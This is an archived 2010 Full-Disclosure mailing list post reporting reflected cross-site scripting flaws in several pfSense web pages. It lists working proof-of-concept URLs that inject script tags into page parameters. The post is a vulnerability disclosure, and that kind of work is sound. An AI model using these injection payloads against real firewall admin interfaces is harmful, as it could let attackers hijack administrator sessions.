| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 6 Nov 2010 15:08:32 +1100 From: dave b <db.pub.mail@...il.com> To: full-disclosure <full-disclosure@...ts.grok.org.uk> Subject: pfsense xss issues. "Those who cannot learn from history are doomed to repeat it." - George Santayana http://cvstrac.pfsense.org/chngview?cn=20994 "Comment: Make scripts XSS input safe. " Date: 2008-Feb-11 23:33:24 (local) 2008-Feb-12 04:33:24 (UTC) So in 2010, pfsense 2 beta 4: ... xss -> pkg_edit.php https://10.0.20.220/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E xss -> pkg.php https://10.0.20.220/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E ... ----------- in pfsense 2 beta 4: xss -> status_graph.php https://10.0.20.220/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E xss -> interfaces.php https://10.0.20.220/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E ------------- And in pfsense (stable and 2 beta 4): http://10.0.20.222/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname= or http://10.0.20.222/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E -- question = ( to ) ? be : ! be; -- Wm. Shakespeare _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists